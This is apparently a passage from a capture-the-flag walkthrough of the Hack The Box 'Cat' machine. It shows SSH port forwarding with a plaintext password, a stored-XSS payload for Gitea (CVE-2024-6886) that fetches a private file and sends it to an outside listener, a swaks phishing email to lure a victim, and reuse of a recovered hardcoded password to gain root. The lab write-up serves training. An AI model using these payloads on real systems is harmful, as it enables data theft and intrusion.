by cat.htb (8.15.2/8.15.2/Submit) id 48S55Sm0002267
for axel@localhost; Sat, 28 Sep 2024 05:05:28 GMT
Date: Sat, 28 Sep 2024 05:05:28 GMT
From: rosa@cat.htb
Message-Id: <202409280505.48S55Sm0002267@cat.htb>
Subject: Employee management

We are currently developing an employee management system. Each sector
administrator will be assigned a specific role, while each employee will be able
to consult their assigned tasks. The project is still under development and is
hosted in our private Gitea. You can visit the repository at:
http://localhost:3000/administrator/Employee-management/. In addition, you can
consult the README file, highlighting updates and other important details, at:
http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md.

Let's forward ports 25 and 3000 to ourselves; the target's port 25 will be reachable on our machine as
2525:

sshpass -p'aNdZwgC4tI9gnVXv_e3Q' ssh -L 3000:127.0.0.1:3000 -L 2525:127.0.0.1:25 axel@cat.htb

We look at port 3000 and find Gitea 1.22.0:

This version of Gitea has a stored XSS, CVE-2024-6886, and there is a public example of the exploit.

We can also log in as axel with his password.

We need to create a repository and put the XSS in the Description field. From the email we
remember that we want to get into the administrator's repository: we are offered the README.md file,
but we will aim for http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php
instead. Let's add the following payload:

<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.16.11:4243/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">XSS test</a>

Let's put it in the Description when creating the repository, and note the repository name:

You also need to remember to create at least one file in the repository (any empty file will do)!


Now let's send jobert a link to our repository (I had to send the link many times, and also had to
double-check that the scheduler hadn't deleted our repository):

swaks --to "jobert@localhost" --from "axel@localhost" --header "Subject: click link" --body "http://localhost:3000/axel/xss" --server localhost --port 2525 --timeout 30s
=== Trying localhost:2525...
=== Connected to localhost.
<- 220 cat.htb ESMTP Sendmail 8.15.2/8.15.2/Debian-18; Sun, 2 Feb 2025 08:39:36
GMT; (No UCE/UBE) logging access from: localhost(OK)-localhost [127.0.0.1]
-> EHLO vm
<- 250-cat.htb Hello localhost [127.0.0.1], pleased to meet you
<- 250-ENHANCEDSTATUSCODES
<- 250-PIPELINING
<- 250-EXPN
<- 250-VERB
<- 250-8BITMIME
<- 250-SIZE
<- 250-DSN
<- 250-ETRN
<- 250-AUTH DIGEST-MD5 CRAM-MD5
<- 250-DELIVERBY
<- 250 HELP
-> MAIL FROM:<axel@localhost>
<- 250 2.1.0 <axel@localhost>... Sender ok
-> RCPT TO:<jobert@localhost>
<- 250 2.1.5 <jobert@localhost>... Recipient ok
-> DATA
<- 354 Enter mail, end with "." on a line by itself
-> Date: Sun, 02 Feb 2025 11:39:36 +0300
-> To: jobert@localhost
-> From: axel@localhost
-> Subject: click link
-> Message-Id: <20250202113936.006274@vm>
-> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
->
-> http://localhost:3000/axel/xss
->
->
-> .
<- 250 2.0.0 5128daGS009077 Message accepted for delivery
-> QUIT
<- 221 2.0.0 cat.htb closing connection
=== Connection closed with remote host.

Finally, we catch the source code of index.php, in which the password is
hardcoded:

Decoding the URL-encoded response via CyberChef:

<?php
$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';
...

And we try this password for the root user via su:

$ su
IKw75eR0MR7CMIxhH0

Root flag
